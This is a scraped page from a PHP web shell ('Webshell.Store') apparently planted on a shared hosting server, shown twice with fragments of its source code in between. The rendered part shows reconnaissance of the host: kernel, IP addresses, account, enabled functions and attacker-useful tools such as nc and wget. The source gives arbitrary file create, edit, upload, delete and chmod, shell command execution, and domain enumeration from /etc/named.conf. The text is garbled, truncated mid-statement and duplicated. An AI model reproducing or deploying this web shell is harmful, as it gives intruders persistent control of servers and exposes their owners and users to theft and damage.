Linux lhcp3406.webapps.net 3.10.0-962.3.2.lve1.5.82.el7.x86_64 #1 SMP Tue Oct 31 10:15:24 UTC 2023 x86_64
 Apache
 81.88.53.156 | Your IP: 216.73.216.127
 Cant read [ /etc/named.conf ]
 [ drwxr-xr-x ]
/ proc / self / root / lib / firmware / qed /


Operating System : Linux lhcp3406.webapps.net 3.10.0-962.3.2.lve1.5.82.el7.x86_64 #1 SMP Tue Oct 31 10:15:24 UTC 2023 x86_64
User / Group : 1190[c43ut3hs] / 1192[c43ut3hs]
PHP Version : 5.6.40
IP Server : 81.88.53.156
Your IP : 216.73.216.127
Storage : Total = 1.05 TB, Free = 313.89 GB [29%]
Domains : Cant read [ /etc/named.conf ]
Software : Apache
Disable Functions : All function is accessible
Useful Functions : gcc, lcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip, bzialfa2, nc, locate, suidperl, git, docker, ssh
Downloader : wget, fetch, lynx, links, curl, get, lwp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : ON | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF
Safe Mode : OFF | Open Basedir : NONE | Safe Mode Exec Dir : NONE | Safe Mode Include Dir : NONE
Name Type Size Owner/Group Permission Last Modified Actions
. dir - root/root drwxr-xr-x 2023-11-27 01:20:18
.. dir - root/root drwxr-xr-x 2023-11-27 01:29:02
qed_init_values-8.10.9.0.bin file 1.37 MB root/root -rwxr-xr-x 2023-08-17 05:51:58
qed_init_values-8.14.6.0.bin file 1.39 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.18.9.0.bin file 1.47 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.20.0.0.bin file 1.38 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.30.12.0.bin file 1.44 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.33.12.0.bin file 1.49 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.37.7.0.bin file 1.49 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.40.33.0.bin file 1.52 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.10.10.0.bin file 762.28 KB root/root -rw-r--r-- 2023-08-17 05:51:59
qed_init_values_zipped-8.10.5.0.bin file 749.54 KB root/root -rw-r--r-- 2023-08-17 05:51:58
qed_init_values_zipped-8.15.3.0.bin file 771.04 KB root/root -rw-r--r-- 2023-08-17 05:51:59
qed_init_values_zipped-8.20.0.0.bin file 775.84 KB root/root -rw-r--r-- 2023-08-17 05:51:59
qed_init_values_zipped-8.33.1.0.bin file 818.96 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.33.11.0.bin file 832.48 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.37.2.0.bin file 847.14 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.37.7.0.bin file 851.85 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.4.2.0.bin file 407.16 KB root/root -rw-r--r-- 2023-08-17 05:51:58
qed_init_values_zipped-8.42.2.0.bin file 869.47 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.7.3.0.bin file 462.69 KB root/root -rw-r--r-- 2023-08-17 05:51:58

Copyright © ULTRA
f (file_put_contents($_POST['newFileName'], $_POST['newFileContent'])) { flash("Create File Successfully!", "Success", "success", "?dir=$path"); } else { flash("Create File Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') { flash("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if (rename($path . '/' . $_GET['item'], $_POST['newName'])) { flash("Rename Successfully!", "Success", "success", "?dir=$path"); } else { flash("Rename Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newContent']) && isset($_GET['item'])) { // Decode the base64 encoded content from client side $decodedContent = base64_decode($_POST['newContent']); if (file_put_contents($path . '/' . $_GET['item'], $decodedContent)) { flash("Edit Successfully!", "Success", "success", "?dir=$path"); } else { flash("Edit Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') { flash("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if (chmod($path . '/' . $_GET['item'], $_POST['newPerm'])) { flash("Change Permission Successfully!", "Success", "success", "?dir=$path"); } else { flash("Change Permission", "Failed", "error", "?dir=$path"); } } if (isset($_GET['action'])) { $action = $_GET['action']; if ($action == 'delete' && isset($_GET['item'])) { function removedir($dir) { if (!file_exists($dir)) { return false; } if (is_file($dir)) { return unlink($dir); } $files = array_diff(scandir($dir), ['.', '..']); foreach ($files as $file) { $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { removedir($path); } else { unlink($path); } } return rmdir($dir); } $item_path = $path . DIRECTORY_SEPARATOR . $_GET['item']; if (is_dir($item_path)) { if (removedir($item_path)) { flash("Delete Folder Successfully!", "Success", "success", "?dir=$path"); } else { flash("Delete Folder Failed", "Failed", "error", "?dir=$path"); } } else if (is_file($item_path)) { if (unlink($item_path)) { flash("Delete File Successfully!", "Success", "success", "?dir=$path"); } else { flash("Delete File Failed", "Failed", "error", "?dir=$path"); } } else { flash("Item not found!", "Failed", "error", "?dir=$path"); } } } if (isset($_FILES['uploadfile'])) { $total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) { $mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]); } if ($total < 2) { if ($mainupload) { flash("Upload File Successfully! ", "Success", "success", "?dir=$path"); } else { flash("Upload Failed", "Failed", "error", "?dir=$path"); } } else { if ($mainupload) { flash("Upload $i Files Successfully! ", "Success", "success", "?dir=$path"); } else { flash("Upload Failed", "Failed", "error", "?dir=$path"); } } } $d0mains = @file("/etc/named.conf", false); if (!$d0mains) { $dom = "Cant read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "$count Domain"; } if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $sys = "win"; } else { $sys = "unix"; } if ($sys == 'unix') { $useful = ""; $downloader = ""; if (!@ini_get('safe_mode')) { if (strlen(cmd("id")) > 0) { $userful = ['gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzialfa2', 'nc', 'locate', 'suidperl', 'git', 'docker', 'ssh']; $x = 0; foreach ($userful as $i) { if (which($i)) { $x++; $useful .= $i . ', '; } } if ($x == 0) { $useful = '--------'; } $downloaders = ['wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror']; $x = 0; foreach ($downloaders as $i) { if (which($i)) { $x++; $downloader .= $i . ', '; } } if ($x == 0) { $downloader = '--------'; } } else { $useful = '--------'; $downloader = '--------'; } } else { $useful = '--------'; $downloader = '--------'; } } $ip = gethostbyname($_SERVER['HTTP_HOST']); $uip = $_SERVER['REMOTE_ADDR']; $serv = $_SERVER['HTTP_HOST']; $soft = $_SERVER['SERVER_SOFTWARE']; $cmd_uname = cmd("uname -a"); $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : 'Uname Error!'); $total = disk_total_space($path); $free = disk_free_space($path); $pers = (int)($free / $total * 100); $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "All function is accessible"; if (@ini_get('open_basedir')) { $basedir_data = @ini_get('open_basedir'); if (strlen($basedir_data) > 120) { $open_b = "" . substr($basedir_data, 0, 120) . "..."; } else { $open_b = '' . $basedir_data . ''; } } else { $open_b = 'NONE'; } if (!function_exists('posix_getegid')) { $user = function_exists("get_current_user") ? @get_current_user() : "????"; $uid = function_exists("getmyuid") ? @getmyuid() : "????"; $gid = function_exists("getmygid") ? @getmygid() : "????"; $group = "?"; } else { $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : ["name" => "????", "uid" => "????"]; $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : ["name" => "????", "gid" => "????"]; $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $dirs = scandir($path); ?> Store : Webshell.Store
 Linux lhcp3406.webapps.net 3.10.0-962.3.2.lve1.5.82.el7.x86_64 #1 SMP Tue Oct 31 10:15:24 UTC 2023 x86_64
 Apache
 81.88.53.156 | Your IP: 216.73.216.127
 Cant read [ /etc/named.conf ]
 [ drwxr-xr-x ]
/ proc / self / root / lib / firmware / qed /


Operating System : Linux lhcp3406.webapps.net 3.10.0-962.3.2.lve1.5.82.el7.x86_64 #1 SMP Tue Oct 31 10:15:24 UTC 2023 x86_64
User / Group : 1190[c43ut3hs] / 1192[c43ut3hs]
PHP Version : 5.6.40
IP Server : 81.88.53.156
Your IP : 216.73.216.127
Storage : Total = 1.05 TB, Free = 313.89 GB [29%]
Domains : Cant read [ /etc/named.conf ]
Software : Apache
Disable Functions : All function is accessible
Useful Functions : gcc, lcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip, bzialfa2, nc, locate, suidperl, git, docker, ssh
Downloader : wget, fetch, lynx, links, curl, get, lwp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : ON | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF
Safe Mode : OFF | Open Basedir : NONE | Safe Mode Exec Dir : NONE | Safe Mode Include Dir : NONE
Name Type Size Owner/Group Permission Last Modified Actions
. dir - root/root drwxr-xr-x 2023-11-27 01:20:18
.. dir - root/root drwxr-xr-x 2023-11-27 01:29:02
qed_init_values-8.10.9.0.bin file 1.37 MB root/root -rwxr-xr-x 2023-08-17 05:51:58
qed_init_values-8.14.6.0.bin file 1.39 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.18.9.0.bin file 1.47 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.20.0.0.bin file 1.38 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.30.12.0.bin file 1.44 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.33.12.0.bin file 1.49 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.37.7.0.bin file 1.49 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values-8.40.33.0.bin file 1.52 MB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.10.10.0.bin file 762.28 KB root/root -rw-r--r-- 2023-08-17 05:51:59
qed_init_values_zipped-8.10.5.0.bin file 749.54 KB root/root -rw-r--r-- 2023-08-17 05:51:58
qed_init_values_zipped-8.15.3.0.bin file 771.04 KB root/root -rw-r--r-- 2023-08-17 05:51:59
qed_init_values_zipped-8.20.0.0.bin file 775.84 KB root/root -rw-r--r-- 2023-08-17 05:51:59
qed_init_values_zipped-8.33.1.0.bin file 818.96 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.33.11.0.bin file 832.48 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.37.2.0.bin file 847.14 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.37.7.0.bin file 851.85 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.4.2.0.bin file 407.16 KB root/root -rw-r--r-- 2023-08-17 05:51:58
qed_init_values_zipped-8.42.2.0.bin file 869.47 KB root/root -rwxr-xr-x 2023-08-17 05:51:59
qed_init_values_zipped-8.7.3.0.bin file 462.69 KB root/root -rw-r--r-- 2023-08-17 05:51:58

Copyright © ULTRA